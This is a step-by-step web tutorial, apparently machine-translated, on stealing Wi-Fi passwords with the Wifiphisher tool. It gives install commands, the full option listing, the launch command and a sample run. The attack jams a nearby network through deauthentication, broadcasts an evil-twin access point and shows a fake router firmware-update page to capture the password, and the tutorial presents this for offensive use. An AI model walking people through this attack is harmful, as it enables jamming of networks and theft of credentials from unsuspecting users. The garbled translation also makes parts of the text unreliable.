While cracking passwords and WPS setup attacks attract a lot of attention, social engineering attacks are by far the quickest way to get a Wi-Fi password. Wifiphisher is one of the most powerful Wi-Fi social engineering attacks, a tool that blocks the Internet until desperate users enter the Wi-Fi password to allow a fake router firmware update.
Social engineering attacks are powerful because they often completely bypass security. If you can trick an employee into typing a password into a fake login page, it does not matter how strong the password is. This is the opposite of attacks where you use the computer's power to try out a huge list of passwords incredibly quickly. Because of the way this attack works, you can not succeed if the password you are attacking is strong and is not in your password list.
If you do not know how strong the attacked password is, it can be frustrating because the attack is frustrating. Time and processing power associated with a brute-force attack can make the dry feeling look like a huge waste of resources to let. Instead, tools like Wifiphisher ask questions about the people behind these networks. Does the average user know what the login page of their wireless router looks like? Would you know if it would be different? More importantly, would a busy user who is disconnected and stressed from the Internet still enter the password to activate a fake update, even if he notices that the login page looks a little different?
Wifiphisher believes that the answer is "Yes." To test this theory, the tool can select a nearby Wi-Fi network, de-authenticate all users (jamming), and create a clone access point that does not require a password. Anyone who joins the evil, twin-network network will see a compelling-looking phishing page that requires the Wi-Fi password to enable a firmware update. This is the reason why the Wi-Fi does not work anymore.
In a social engineering attack, the first signs of Wifiphisher look like a problem with the router. At first the WLAN fails. You can still see the network, but every connection attempt fails immediately. Other devices can not connect to the network, and they realize that not just one device, but every wireless device has lost connection to the network.
They notice a new network with the same name as the old network but no password required. After a few more attempts to connect to the protected network, they join the open network, worried that their router will suddenly send a network without a password, to which anyone can access. As soon as they join, an official-looking website will be opened with the router's manufacturer informing them that the router is undergoing an important firmware upgrade. The Internet will not work until you enter the password to apply the update.
After entering the highly secure Wi-Fi password, a loading screen crawls across the screen when the router restarts and you are a bit proud of the security of your router by installing this important update. After waiting a minute, their devices reconnect to the network, now they are more secure thanks to the installed update.
For a hacker, retrieving passwords is as simple as choosing the network you want to target. After you set a destination, Wifiphisher immediately blocks all devices connected to the network. This increases the likelihood that a person connected to the network will be frustrated and will apply the fake update. Next, the network information of the destination is cloned and the spoofed Wi-Fi network is broadcast for the destination to believe the router is in an indefinite update mode.
Devices that connect are immediately logged to a list of connected targets. and the phishing page is tailored to the manufacturer of the router by reading the first part of the router's MAC address. After the Wifiphisher persuades one of the destinations connected to the destination network to enter the password, it informs the hacker while blocking the time. After sending the captured password, the target is cruelly busy with a fake update load screen and an incorrect reboot timer to give the hacker time to test the captured password.
For this attack to work, you need a Kali Linux-compatible wireless adapter. If you are not sure which choices you should make, read one of the guides by selecting one that supports watch mode and package injection.
Apart from a good wireless adapter, you need a computer running Kali Linux. You should upgrade this first by performing apt update and apt upgrade . Failure to do so will likely cause problems during the following Wifiphisher installation process.
To start, you can open a terminal window and type apt install wifiphisher to install Wifiphisher.
apt install Wifiphisher
Read package lists ... Done Create dependency tree Status information is read ... Done The following packages were automatically installed and are no longer needed: guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0 libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160 libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16 liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26 libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24 libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21 libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9 libradare2-3.0 libsane-extras libsane-extras-common libtbb2 libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql python-anyjson python-capstone python-couchdbkit python-http-parser python-jwt python-libemu python-pam python-restkit python-socketpool x11proto-dri2-dev x11proto-gl-dev Use "apt autoremove" to remove it. The following additional packages will be installed: python-pbkdf2 python-pyric python-roguehostapd Suggested packages: python-pyric-doc The following NEW packages will be installed: Python-Pbkdf2 Python-Pyric Python-Roguehostapd Wifiphisher 0 updated, 4 reinstalled, 0 removed and 422 not updated. 4,579 kB archives are required. After this process, you will need 10.8 MB of additional disk space. Would you like to continue? [Y/n] y Get: 1 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-pbkdf2 all 1.3 + 20110613.git2a0fb15 ~ ds0-3 [7,398 B] Get: 2 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-pyric all 0.1.6-0kali1 [308 kB] Get: 3 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB] Get: 4 http://mirrors.ocf.berkeley.edu/kali kali-rolling / main amd64 wifiphisher all 1.4 + git20180525-0kali2 [3,862 kB] 4,579 kB in 10s (458 kB / s) Select the previously unselected package python-pbkdf2. (Reading the database ... 431969 Files and directories are currently installed.) Preparation for unpacking ... / python-pbkdf2_1.3 + 20110613.git2a0fb15 ~ ds0-3_all.deb ... Unpack Python-pbkdf2 (1.3 + 20110613.git2a0fb15 ~ ds0-3) ... Selection of the previously unselected package python-pyric. Preparation for unpacking ... / python-pyric_0.1.6-0kali1_all.deb ... Unpack Python Pyric (0.1.6-0kali1) ... Select the previously unselected package python-roguehostapd. Preparation for unpacking ... / python-roguehostapd_1.2.3-0kali2_amd64.deb ... Unpack Python roguehostapd (1.2.3-0kali2) ... Select a previously unselected pak wiper. Preparation for unpacking ... / wifiphisher_1.4 + git20180525-0kali2_all.deb ... Unpack Wifiphisher (1.4 + git20180525-0kali2) ... Set up Python-roguehostapd (1.2.3-0kali2) ... Setting up python-pbkdf2 (1.3 + 20110613.git2a0fb15 ~ ds0-3) ... Set up Python-Pyric (0.1.6-0kali1) ... Set up Wifiphisher (1.4 + git20180525-0kali2) ... Progress: [ 95%] [#######################################################...]
If you want to try installing through the GitHub repo, you can do so by cloning the repository and following the instructions on the GitHub page:
git clone https://github.com/ wifiphisher / wifiphisher.git cd wifiphisher sudo python setup.py install
This should install Wifiphisher, which you can start by entering the program name in a terminal window.
You should be able to run the script at any time simply by typing sudo wifiphisher in a terminal window. While Wifiphisher does not have a man page, on its – help page, you can see that there is a pretty impressive list of configuration options that you can change by adding different flags to the command.
Use: Wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE] [-aI APINTERFACE] [-iI INTERNETINTERFACE] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID] optional arguments: -h, --help View and exit this help message -i INTERFACE, - INTERFACE INTERFACE Manually select an interface that supports both AP and Monitor modes for spawning the rogue AP as well install additional Wi-Fi attacks from extensions (i.e., deauth). Example: -i wlan1 -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE Manually select an interface that supports the monitor Mode to defuse the victims. Example: -eI wlan1 -aI APINTERFACE, --apinterface APINTERFACE Manually select an interface for which AP mode is supported Spawning rogues AP. Example: -aI wlan0 -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE Choose an interface that is connected to the InternetExample: -iI ppp0 -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE Enter the MAC address of the AP interface -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE Enter the MAC address of the expansion interface -iNM, -no-mac-randomization Do not change a MAC address -kN, --keepnetworkmanager Do not quit NetworkManager -nE, --noextensions Do not load extensions. -nD, --nodeauth Skips the deauthentication phase. -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] - deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...] Channels to deauth. Example: --deauth-channels 1,3,7 -e ESSID, --essid ESSID Enter the ESSID of the rogue access point. This option skips the access point selection phase. Example: --essid & # 39; Free WiFi & # 39; -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID Remove all BSSIDs in WLAN with this ESSID. -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO Select the phishing scenario that you want to run. This option is displayed Skip the scenario selection phase. Example: -p firmware_upgrade -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY Add the WPA / WPA2 protection for the rogue access point. Example: -pK s3cr3tp4ssw0rd -HC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE Capture the WPA / WPA2 handshakes for review passphraseExample: -hC capture.pcap -qS, --quitonsuccess Stop the script after you successfully retrieve a pair of testimonies -lC, --lure10-capture Enter the BSSIDs of the detected APs during the AP selection phase. This option is part of Lure10 attack. -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT Make Windows Windows locator near you User to believe that it is in an area that was previously recorded with --lure10-capture. part of Lure10 attack. --Logging log activity in file -dK, --disable-karma Disables the KARMA attack -lP LOGPATH, --logpath LOGPATH Determine the full path of the log file. -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH Determine the full path of the file to be saved all recorded evidence --Payload path PAYLOAD_PATH Payload path for scenarios that serve a payload -cM, --channel monitor Monitor if the destination access point changes the channel. -wP, --wps-pbc Monitor if the button is present on a WPS PBC Registrar pressed. -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE The WLAN interface used to map to the WPS Access point. -kB, --known-beacons Sends a series of beacon frames popular Wi-Fi -fH, --force-hostapd Forces the use of the hostapd installed in the system -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY Search for phishing sites at this point --dnsmasq-conf DNSMASQ_CONF Determine the full path of a custom dnmasq.conf file -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID Determine the ESSID you want to use for phishing Page
Step 3: Plug in your wireless adapter
Now is the time to prepare the wireless adapter by plugging it in. Wifiphisher puts your card in Wi-Fi surveillance mode for you if you do not do it yourself
I will use my USB wireless network adapter, so I add a -i flag and the name of my network adapter to the command. Otherwise, Wifiphisher will simply pick up the network adapter.
To start the script I execute the following command:
sudo wifiphisher -i wlan1
After that, we should see a page showing every nearby network. We can choose which network we want to attack, and then press [Enter] .
Next the script will ask Which attack do you want to execute? Select option 2.
After you have selected the attack, it will start immediately. It opens a page that listens for targets joining the network. Wifiphisher also looks for devices that try to connect to networks that do not exist and creates fake versions to attract these devices to connect to.
After a destination has logged in, a pop-up window prompts for the password.
If the destination enters the password, we will be notified in the "Wifiphisher" screen.
That's it! The script will exit and show you the password just entered.
[*] Starting Wifiphisher 1.4GIT (https://wifiphisher.org) at 2019-02-04 08:10 [+] Time zone detected. Set channel range to 1-13 [+] Selection of the wfphshr-wlan0 interface for the Deauthentication Attack [+] Selection of the wlan1 interface for creating the rogue access point [+] Change the MAC address of wlan1 (BSSID) to 00: 00: 00: 31: 8c: e5 [!] The MAC address could not be set. (Tried 00: 00: 00: ee: 5c: 95) [+] SIGKILL is sent to wpa_supplicant [+] SIGKILL is sent to dhclient [+] SIGKILL is sent to dhclient [+] Sending SIGKILL to NetworkManager [*] Leasing contracts deleted, DHCP started, iptables set up [+] Selection of firmware update page template [*] The wrong access point is started ... [*] Start the HTTP / HTTPS server at ports 8080, 443 [+] Show your support! [+] Follow us: https://twitter.com/wifiphisher [+] Like us: https://www.facebook.com/Wifiphisher [+] Recorded evidence: wfphshr-wpa-password = mypassword [!] Close
You've bypassed password security and tricked a user into entering the Wi-Fi password into your wrong network. Worse, they're still behind that dreadful, slow-moving, fake loading screen.
If you're looking for a cheap device A handy platform for getting started with Wifipfisher. Take a look at our Kali Linux Raspberry Pi build with the $ 35 Raspberry Pi.